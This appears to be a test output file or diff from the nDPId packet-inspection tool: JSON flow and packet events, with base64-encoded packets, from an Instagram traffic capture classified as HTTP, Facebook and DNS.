+02397{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1436720942592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942592,"pkt":"QPMIw47hABsv8H60CABFAAW+MAJAADkG3jFSVRqiwKgAZwBQ4sRSEFIWL7VmbIAQAghpXgAAAQEIClYL0tgAA\/vKkxiut5qB26Ow9Pj8+yfWMCa4DUGy+Ho3+c5jmKfpvReNdKH0EH5lbcbz+eZjXvWt849W37RLwLcqfYn89ApepLzJrn01eX8qj3x\/Byg9vl4hMftksS8eq4V9yQ9dg87nd3j8t6NPn9HZ78M8\/m15\/SI4iV0+Hr5YZdJFWiriRaANGqKgC2yBU5D1y9AGO5LwC+hZAOnTCa0b8GSfSXc3ZK6AUI8M2\/RlL0N3AaXqkYlae70WFvXE\/MysjfHhicTX059\/nyudDYrqom8O\/SwbXeAYWCl2HDbeHOmh0nFvU+hbHnPQ5vucrmudw17ngsyPVk8VHSYNOA4HAkiaZ9LkB4VlFV6oQoQoqHF7YpwjYwQuo3UsJOh\/RGPbfOPDFikaxDY4DU5OkkXmo2bPofj3YqtI3A2tMe8H5Nt8O55y1B5\/7N5\/Hj7N63x3O1z+g38A6wXb+eEc9NDyaVW6IJldX6R5B6ZmuRoJAaDtPubZt\/FrO\/ofNxI07nn+e9Kt8ed1WPUA43vniOOoe+MdtjoYlp8vJuziWF9ZSfTEwvQuT1MrucEnl3NmPfozec2Q8b4rocvm7XZ0ZulcvKtUOGRAQ4+gnWZDVgPNWhEKtHOpze6ZyDRXdX8BKT0GfAkRXbz40uX19WJqIDO0OmFTszkplJub3z+cPQ\/JvQ6z862sGNz1mVnCXPSY4Ty9OzHqpGSzpKihVIIPNmVKcRNOqLCYDILVVeEY398LgV1vOVI9RE0wT4QEQJpSDAaZU3nNoOD251yCtoLfS5daqb9QCMzcp43dzem6ufhS6Oew6aI6IVlfacgTJtbFeleWXZh0ue8o8\/FVehcsDozfPVyqd2beAaLdw7AEWuPBsy\/NtRo7nK6amwzE7wely5\/Li6bHG7EM3mel42aI9A86edPRMPG0Ly9C4IXGVdSXyWneZ42VsFYuj6kTogdbNyRn62pnUvPuruzMr3A+oweXcoviYt9jgW6815zm+k8\/tAB\/OBUuybA1gvm903GUlLnZS6ZF4KFr24FYdVfxNcHoN\/nFir0ejjdiS\/RN6WHm6VtwnvhPbN\/CPbfkffMXtuX3qjh3relJQiEoMQKEpOyKasJqD
Id1NjV21hXC6QDvdJEJVO1s\/Q\/zN6OTm8v3oOGonI9l57alQUrkXYpZMcsGthFgcg05VXIYrOJRhIhUfQ\/A63I8zG3eKzunHr8oC2NDAbQaOkGxtKX2WhycdMdrn93jLkKuKz3vZ9JmVLTQZa3BEZ0bqBxVlISUosM18C1LstzjfR8zjgcXvgyeor56XydIvT6GCMTACyMtUrgCKhlE19BSC9tDF2gkO5dOOJom5fPt2VnLbnJsVlaDDEPHHuS8fSny7ebZ3qPK2w9TgzU+rEx8ulpAaNFzDbyos643zk7Ou5p5O+X0FYusqEnp3Q6dbPtiuk0uU14ejc98q24cupIjGzSHlDhtF575ZOO+XSVH4SnEqKawNGGtZiJmIRtjEC5UnTQtnUn51xEfWfPtM8B7b2wbSKwHWlcGMSfEWVosImWLXNObHxqcs3YBBYOiCN6LkB4epBLK0KLAqqCHVFoZN\/S\/La3Ded0EcjPZ3z3AN\/GxrIy9iG8YgvWH1PnkuwzLWQPtqlhubqs540iAhZVVsNHpgy+LaCMldVgpipyGjRNCQdSLo8zK5\/dN6RMPzzXjRmF7eCA9vW05aci1898xYkdUwXtNbK2ik7MtyrTKySLWrnk2azz+9hky9fQzRuXXXQYOOm8sLU6Mz+T6DMig+c38yaBw+rLTxauj59VjG6rUoWWXRciQb8rJMP0s6wZdhrOeI1OpspY+oXQgyBjtBm3CyFWZNgavivsvzz15cAGTDTH0Hz\/1jzPKsrUpltBIzz0jO0ZWIpZqARY="} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":541,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720950909,"flow_last_seen":1436720950909,"flow_idle_time":7560000,"flow_min_l4_payload_len":1398,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":1398,"flow_avg_l4_payload_len":1398,"midstream":1,"thread_ts_msec":1436720950909,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+02393{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1436720950909,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":1436720950909,"pkt":"QPMIw47hABsv8H60CABFAAWqgMlAAFYGaDQfDVY0wKgAZwBQ42ig4vcaLhm0z4AQADsFTwAAAQEIChPCQpUAA\/8J\/RR\/Qw44auNd5sy65M8X7sSNLvesqLPp\/hWIEgj7u\/c3G33+CGWHr5NjTBvseCa33d9vm54JLq\/16uWtfE8LiAl4wMLDP475fV1R18fJlgWHzmvfo5rv8qseyXDb2HUuXqKoKX0JEHYQ4SCsd7x2l6PL5eytk2f\/kmJp\/iODsxx2N\/N4UQwH1r7vqSLq\/y5DElOXzRARZUzbImejgsz5wOzVgeOngfBrQtGX6fL5DmkthCiZgx4mBvjCvzFR0YP1xM0OXv+CShnIqVrP5zMdqJDyzU483pE+34fsEdDMZT4JhGoy\/98gru4qi0lyXyEksrGabld776ByfJIVVp4RivH8YLNUqtpfCVBnMTiA7j\/sfl7slzSCJaM2S8tAkbhjEusFLl75fI1asIxOiRsWcrVhmx\/PbZlpNd4K8\/v2iJLC1YElBY1y9j56WJc0LPwne+0suiyX3kgj3Fb6y+5RCsQCy2EKLdhWRbyLYVKkL4lX1A\/hBl\/EQkdQU6AhwlzHoU9XC8zrf\/sv+pTGiGgMczA3HQL0c6iXziIlynBHwH6WDIGpFhs4sIl7R4Y0SaCPOZA1lnMfjRJoKCOWKLZc4VEiazWUhaMala+ExIJc2XmtrYy\/iRYyo+LY2ytYUtBbJwRglHwtVOPffxRf4sv1nIag0M0miGXxU6GsLdqvokImfUh+1xnyRB2wekFeanQUhm7KU2GNA\/Wut8I6Yh\/BrGK2ISAtFCkh5uw9+EN15dd79TckDZ5M\/1IXL8vqbu\/hTG\/JfucZfR3dz3L3c+OhdygQW8UzKVOFvvFE3uZQnd322DAH7zC3LRHAXbCjqHBmwf2whhpegjLfm6RfL+z+IzmMokA9e2qfVhZ6xYQdwpjxowXA\/a0hFuEIYBqgg2RBxOTW9B0lNexKZj7L7myCIQt5asMs3OULjIFOSJmLxUIk3Q37w4ymEfVUM4Q7YQrd2Q7D7oXQeE3jsBBmSxiRovqahgnBN4hvIeCZZMLY1uvosfkYR3vNLSiHuKZeam\/RFQJomYqTPcrO3yya\/L8n\/bJvfwlRzHWNuu76VGEBOTSmIQrzPwlvzfa91FS9xmltfjK8v2vivjQ79d9wnDovM7E8heMjng\/L76qTSur9Xu++liqI9lESwcV36\/iMv+UhBAvwlNl9yFOXzTHExcfuKxDjy2WcT\/yjID\/XwdhLUHYsgQ9jzrKZiitJYPrb03G\/4eqDHUUFspftslQp6lFXZbtMgT+PtX+iul7L97VDMHXGdwaI8TzZ6\/jXre8vnY2F+CmIZKNEjnJpMB39UHX\/p7\/3FfZpIUwHcB3IlgFw2RAH5dbcIGzC1nhuJYVIQctqJ04wUFMG9bZhr46HZ73BXAQuUhUW68mxXOEcSUvu6IiD4944qVAoG\/m5vfXCzer8TXXbtxGJy\/lJZWKxmuOzEdM\/69tZAld3d7Oi+E\/\/wSXdP1F9r8RHsvFnMaKa\/Gb3fFq120z5c
fUI5ObITs4O5x1e\/k2SP4T55SQ1l\/\/E7jbfd3y\/W+K4YanQb4PNdLvnwtOUEVU10v172Jve733E93FYrd8\/r7COigUu\/j7zMkQoWBxC6yXxRL8fBFpX1\/jifjboOb9QR4q79l+S7kBZXF3dpMduttP55\/mpWYFflzvfd\/Hx+Ie9ijit30tVfYliZvDoVqX8Iibo18xmX2SURsTLcDlv6t9hYNRdUnFiX1r9e4\/4uD+iVcRBUU8hc0fHv5tu\/ghpv97F5dOxeZj2CiEjpYqtM2N6y9Ex9X2v34njvtqIprtcVwGtsEjAY8n2yd95fX6LnY6678J3vfovd9+pLl7ZMl\/\/3mgopvtAOiqdmdl8m1KgVxW1IDqxnD5Yq+7jVsvs"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1436720950910,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720950910,"pkt":"ABsv8H60QPMIw47hCABFAAA0TetAAEAGtojAqABnHw1WNONoAFAuGbTPoOL3GoAQH8w2dwAAAQEICgAD\/xATwkKT"} +02380{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1436720950911,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":1436720950911,"pkt":"QPMIw47hABsv8H60CABFAAWqgMpAAFYGaDMfDVY0wKgAZwBQ42ig4vyQLhm0z4AYADulrQAAAQEIChPCQpYAA\/8JIuSEmFKcHvUO79IuA4AtgLK1ooHfe\/xvCx6EanjcjDye5qfYfg99btIFMlfpEyS0+WXx48YQQIBKyWOQayb5WbhMWSz8Ru7MV\/a5RJtywzl84iv9BLl6PdqXz3kxPZm4yY8HdjILE3vdfyWVN0pVFaKK+f+Osc32N80bLx0naY6\/StT9w4Neeouf2Tn\/vkhhHb5a5vAV9Sx5efQ\/Fatqq174n5ea7v9ir3vf4yK3Pnlx3v3fywdfv\/ld3jdWI6CQY9xByO962aeABxBaD0Ff8vq65YOluUkGW\/xG5p7nyyq1NumgVeaWXPx2O3qpBCTyam4Mj9KNa9CLu77T788mzfZZLswHVfevJGWxpG6er55a4je67Jde+KzsbHfq771q7M2+z\/WWJw+2E3Gv8+Ffd+tBC77nzd2bXmu\/clj6qf9o8rFbG7XiKrvvv6XxVyXfvsflY+OxHlh7gk3Z3+CHdjx7fieVi8bxm781fQKvN8eNlagx6Pt3\/NOSAfXLBsZ085Sli5c\/HVLg4fEITYcZuYfT1VtMLoUR\/it2aocyhvwSZMTvD5t065r2N7JUsZycS8vq283r4S3bSl8\/xBhG2Ci5YyWnWnN8pxV7z+JfURJd7rip6XefL+Ju6
T2Uxe8n5uUueW8j7FWxyhWWeGt2YWoIb6BgT6P7uCHnx\/HwXcNPzZiXBYPY6liIwioP5BO9O7zdXvrl6Ju71WJu93dF9e+W764JLl\/1aJkh+a8yX4S4lMe7dI+73eX7WiDQUaZve75ZfLkLUJX2tpOX0s4hxEi8nbq2h\/\/mvflq9RBfYRrfTdMUcVv5e78i9rwQyT\/Sl\/1zQY9T8g\/Uty51S6PL8o6JLB8VrQkT8ugJnmu83Eyez2e5Qy1+W7Aw4JHINbEb3Lj395YP7YvjhcMBXfvXJ44Z+Ixmnuj5fXvqryZ8aIvNfJRrTESolEZ4VaoKtE96vFFfwld9u321frxC3vvk10K23e7KuXiuSPeX78kEfFYr7eXpJxFpezOY6TshceqnnmzDJNaHyWEjeK+xtg7siFQxNUarW6raVTT\/fwlt3m1+qIhVuJsRCxFdbFXtQf9\/RdIuTCv1R7IUVly5mtgVW\/5h5d378ta7e\/5QkWm71LXLL\/Y\/yuCATBPFbu75ZM1tF4Xr2urFPeZ1jp6PYqu0ysRtkUSKOnvSvJ9F0HEq\/Rr4RDbTxd+7uU\/Q0X5NSa4riJq7\/YqaIUW4dNr2MWX30vRqr09mqvna6y\/VdiohYPHuWzpM\/5V791hHspd591pkzSvTJiOetcEmlGTx05fm5r+E5WPIYg3+Ld5OiDJCb38Xd9ysF92RKCKwntddXfaT3LP\/4K7yaDr4HbV6D7vh8Ru7u\/ShH0gWZxKK93e\/u7nhshKX\/8u99ZHz6WcFOZh7FbiudjfLamk58fUJd3H2j6sTr\/E4xQhYhPxokXSHH53b6EIn4I8kGvoiAAQAAAAAAACAYAavAAAAAgECXIEAAAAAAAAAAAAAAAACAAWcAAAAZwAAAAUAAQABAAAAAIBgBrAAAAACAQJcAQAAAAAAAAAAAAAAAAIABZwAAABnAAAFoQABAAEAAAAAgGAGsQAAAAIBAlwBAAAAAAAAAAAAAAAAAgAFnAAAAGcAAAs9AAEAAQAAAACA4AayAAAAAgECXEEAAAAAAAAAAAAAAAACAAFNAAAAZwAAENkAAQABARggBwEYIAcAABVgQZrjwgqFiDcfxdYWFjNTGhc\/+kWorCzCP06aQacK5fU3p2bDv4QjGkzRtJEnNbVPk\/10ykQi0ZJ4s6VFQ2Ko59C0bD2u1KUtTyS\/\/DlRe1HhoMlOd6CAkkRYQkwPPOx2Ho6SCe9GzaPNROS+"} +00673{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":572,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720950909,"flow_last_seen":1436720950923,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":29358,"flow_avg_l4_payload_len":917,"midstream":1,"thread_ts_msec":1436720950923,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {}} 
+00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720950909,"flow_last_seen":1436720950923,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":29358,"flow_avg_l4_payload_len":917,"midstream":1,"thread_ts_msec":1436720950923,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {}} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952553,"flow_last_seen":1436720952553,"flow_idle_time":7560000,"flow_min_l4_payload_len":1418,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1418,"flow_avg_l4_payload_len":1418,"midstream":1,"thread_ts_msec":1436720952553,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+02382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1436720952553,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720952553,"pkt":"QPMIw47hABsv8H60CABFAAW+RXVAADMGTWwCFuwzwKgAZwBQrHcqB5rC6nVWeIAQAeYA6gAAAQEICmBlKDgAA\/+vNN9ULewTHBOFuxeelHDOvSnlSV1MyHTuCPSU99J+Rb8TuXzL6L8kVMT9JeX\/AEeHJMKvc8yfZQDY5nhAsWaIx3cLbY2ubZRDNurbaUASgAZ45AKigq45hruCoLni5pLmg59eiPd\/MiN87txVNMyFgkWsWfkcvPvLq3ncGqOJteWDTNpm8JnDNe\/V0S2KHy+GaSkVk8YYmWOQdL4xuwexnBqduXqVc8IuuI9MY+Zt8cnTPcsfLLIlpNfPzE+aRdsInsLztgb98N0mNzOHWHNTZrWKQPr9F5EE8pK7KRl773oe+7TTr1byuTp17xSTo5toqt17OaKtyATyBsMufY15yTPDfHSZYsAADIDSioIAAAHiqKF1TXzn1tX21U6idxttVoiynCqd8u3uesClb\/XTWQXOtPYUXP50lMJRzX9QM7C64zEeROD4ZaaRjli0mWIjfY1adjPenj65KGzqNXJTVghI+6I9UuSYsusH3FlxFno1c9JW3qbWRHfo32lBRAAGeChkqKC5IoYXnRl6Z3L5dCnLn26mSNOSOlqcea5o+UReR652+3d2\/Dab0zb9PXGqPSSLVDbNYRN6MtmpYbJEJLFdJ2RaURdiZY5h0OrU5h7IeY888nVsXnwm4oxv7JWfA68vLc8ehxYrmuOvDGouaBzaCTVP8+zXrnlnrxCWO9ezKKfpVjom7FpO6KTzNl60JdWhqz19c1yubV3UpRimqVV2W9Iuz4HPYBS04ZbGvOuvLXvjiZYsyxAFADSAAAIAHiqKCLcMvDzel9taKZLs5gp0t2Sh58L9ypUAXrhU0aeiss785JfFQgziXCyntnoKqRxzXlrlhljpCKihlu1P7THj6681RUYywmYQzKyhFbllawrlLFUK21TYahBMm4bB0c\/Q0qorQAApkAqZAqooYd7fNpcf2zJkmmfqN4IOKohvY2dlqWGThFbWF\/iVS78WnnJ2uDHuZI98fVGcac2Zm9mcm1UZY5ht7uDaF69Ec7stO3DjzT4G5waWu1vkbTUs3N04NR5d+uk9NE0xVVXqfWMDHPBz3TyJ2pj1SeiHvpcNbNaNfVk2d++zGVKltAVHjbncFMYehMEedktrQOr+f0lWrmtUm+5kDyFpIAAACABpAAAEADxUAvSVxiQ0ufh6dafDwdvPJvem8y03645umpEvJ0dXO8bOVZrlo6+6HRHb0ou72TKnrj5KPN7\/AOgKGio1hlhcLnqyF3+tvLXsSbkfin2t4tioTO4NYFQ\/cjnql8XXv1hza9+0Ud7jZRwM7yzJxDp5um5UBpRFBRFDJUAyXHIMLhp62c7n0OsJjy0iGfHrFKd3PzhU8hjD\/pFzODc\/Y6udSW9S1xmy97TUsc6rydtdS82Etsi8jjdrKKSuKgmeOTOnu4nJHsh6YHzk6+ZUwTisdkMdqJMzvOrXOshOkK636OrSLZYJJHZcArm2apudeK4tWc27cstemRx+TikdR37SEPju+kLssw2Gc1wOvJ2hIdaYk1zq07
Iu2KUuuldIaeHl165wzJM2tQDAAEFA0ACABgAIKiLtm1f2FaZdGxIrg19HJLzj8n4Ypnc+B3T5H9i6KUpcY+86xxUVeVESMl8UPe1Kc82\/VTk3j\/1J5ak58ckqUUUN\/rfyR6eHcXir2n4sx0h9l1nO6iWmGyLxxNiNJu0g3Ybk0hqbHRqCIdPN0XOQitAAKqALljkCrjkGF2Uncud2zD5hCufWAuzR3tSLQmaqnX6OSXbK53hgkuOsgpG7qQpZRqSR+oidlVpZdTrxXdIxxKXxG1ojMpizEzxzZ0OrW7I9gvrG+cnXo1beEccjsojNZyrk6C5qrW4NVKD9vH1VFwxWVxccbqS2Yg5iCSbQN4k01rSK6ZNFZW1N6VuWn84="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1436720952553,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720952553,"pkt":"ABsv8H60QPMIw47hCABFAAA0quZAAEAG4ITAqABnAhbsM6x3AFDqdVZ4KgegTIAQAtavfwAAAQEICgAD\/7RgZSg4"} +02387{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1436720952555,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720952555,"pkt":"QPMIw47hABsv8H60CABFAAW+RXZAADMGTWsCFuwzwKgAZwBQrHcqB6BM6nVWeIAQAeZ8mQAAAQEICmBlKDgAA\/+vtV20fc9mrp1dM1zdmjppSPVtJK34O3VnVq0beVF65xNDXtnFMscw0gMAAAA0IoJBUBRFARUHcs5g82pbGbtawVs6OSKR1bUyvV0dTgqje3NxuXVMt1wlAegfPgme8KPvNkyz2Nzpho206rca8VQBcVDdd9H2q16p8Xe1\/FGG0PnMFm95yjbzbc7y6uXqTNGzWHDjlr1zbmh3aAiPRz9FJQBKIrBUUFyxyAyxUMbqpW7M7s+HSqN8+tay6O9jTtj28wUzIo\/I9c7sc2SRY7SGir2ou5wYpBHamL2VXdh1GOfOiG2KSWK0ZRWURgMc8c2dLwzO6PYryxPPJ14tXbyVLEzu7AiS6csbmt9Otxqax6NG+4uWLSiIMYORwY5GrXsyVyji63ZEef2CRuZlT9tVLFa7rpa4rN2GvKa6elt72n7oBKscxMtLQoy7qN1yh+eGrfONLhtDQAwAAEA0gCRQARQaoCLnm9fzqjnZ3VrTw09XILe19+jPTt59nHFRbU0OOuNydnD0UHny+qEQy39QN7UThl7edlc1nfdBowRUELhmGc+r+yWewvFPtPxXnpDZ1BZmRK8zLPQ38W8W\/X1YhH8M9eufC2d\/AOI79G+kqiNKqKAqKC5YqC5IoY3XSd0Z3Y8akkew1rnv4
HkTku3FOmJHHJJtncsjjclx1kPn70JQGkcLY6tNQ0zKJTVjWvXtSZIzLIrSwjEmjQ8c8c2dDq1OqPYLu39fJ1betucGQOPuDRUSXa1cLIpt3N2mddd7Y5VNmsbw2Da2\/vbQiUjZHiNOuRQ2ZSRqRNXXUTanbbp9PbdNN2jY6tLkwRT\/ANjbmOa9UE6Uotjv45c4hUhaamqOkXoyhy4okgDYACCgaABAAIoAADuWUw2fta4zKI7NJxuGVLi29HLne+NvcdlxB1aHHXK2+xtdVSUBfVAg1XrRV5tTjh624ct8i+wPNScORUqMc8Mwy9A0D69VT7xd7V8U53E5jD5vecyw6sYrVuz2BjjtWSJ8nbzbRwtr0xDjG\/RvaURWshFABQXLDMBUUMbnpi4stLLjsnZ8NankEdmWkdab9Muk5DH3nTO4pEwOWG8yo2aQrXLjZXdiuNM0hcyDVu59yGWKyiLXOcZkMeVY7MM2dDs0OqPZPZydXJ159bc5NQmJyqJ1n3Y9HE20x57YdM68dmx\/qZ\/xubZFscff4rR1u4z59Nv1lM66iJZ3x2S6YP1M3XSpWVsVDbdy6xp4Yopxy1ire9NXUDdH5QwofuPrbhV5y8si6MKyVFHiAwABRANQgJRFAEAFRQtucQmaM4mXub5p95Oznuefj688r5I9Io3NRJy4pPrlN+ht2Ku6h\/QXn5ptuulbZCyuVgkTcvo6\/Kxzrz2meGueGWOSOn3F4n9xzTh4w9X+ac6rWdQ67Ljk1S7rhwtJ3i1X+cw4WoLju5KMI5Io4ONbtW2kog1kACqiguWGYCooYz6ATTO7t5HXhw1qebQF2qZdp0cidTv0Xe9srme4048++yBSFg0z42SRtNxxS2IytrHPX1Ij8Vk7Fa5o\/JWGa5s9+xmDrx9qPYDw1O\/L1a89e2KisZlDBefSxSPipRRjkzbpFVvfK43E7weGqLi0clcfofITO4hnvIobM4rryyF2jrvNWRSt60dFarYqu52R3e5aM9G\/a4brng6ZBkiCt702S5fDbSrWoq\/NToyhaKjMRAFBAUANYAkUAEUBFQHbM3h00ta4zJY\/J3bGvNV08O1ZZGZNGYqLS2JzrXKQObG9Rfd54v2gqlsvGjrpY\/dvL3jmUMnMFz0834bMNsda54g8+w\/HfreHt8+XvQ8OvrspC67h\/dIPKIblw4peerNFqYI1OTSaIwPLKqjmzXmxQGlXFQVcVBVxyBVxUM4="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":663,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7560000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1436720952561,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1436720952561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1436720952561,"pkt":"ABsv8H60QPMIw47hCABFAABZAuBAAEAGAfDAqABnLiFGn+VCAbsSlgM32Tfr4YAYA4n5fAAAAQEICgAD\/7VWGIoUFQMBACAs4KplPbzXnvu9o5LJf4SK8seDxrub6gsxIshtI3HaOA=="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1436720952561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720952561,"pkt":"ABsv8H60QPMIw47hCABFAAA0AuFAAEAGAhTAqABnLiFGn+VCAbsSlgNc2Tfr4YARA4k19gAAAQEICgAD\/7VWGIoU"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":669,"source":"instagram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952563,"flow_last_seen":1436720952563,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1436720952563,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":27124,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"instagram.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1436720952563,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1436720952563,"pkt":"ABsv8H60QPMIw47hCABFAABH\/7VAAEARadHAqABnCAgICGn0ADUAM87BrqQBAAABAAAAAAAACHBob3Rvcy1iAmFrCWluc3RhZ3JhbQNjb20AAAEAAQ=="} 00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":669,"source":"instagram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952563,"flow_last_seen":1436720952563,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1436720952563,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":27124,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"photos-b.ak.instagram.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":694,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720952553,"flow_last_seen":1436720952574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24106,"flow_avg_l4_payload_len":753,"midstream":1,"thread_ts_msec":1436720952574,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
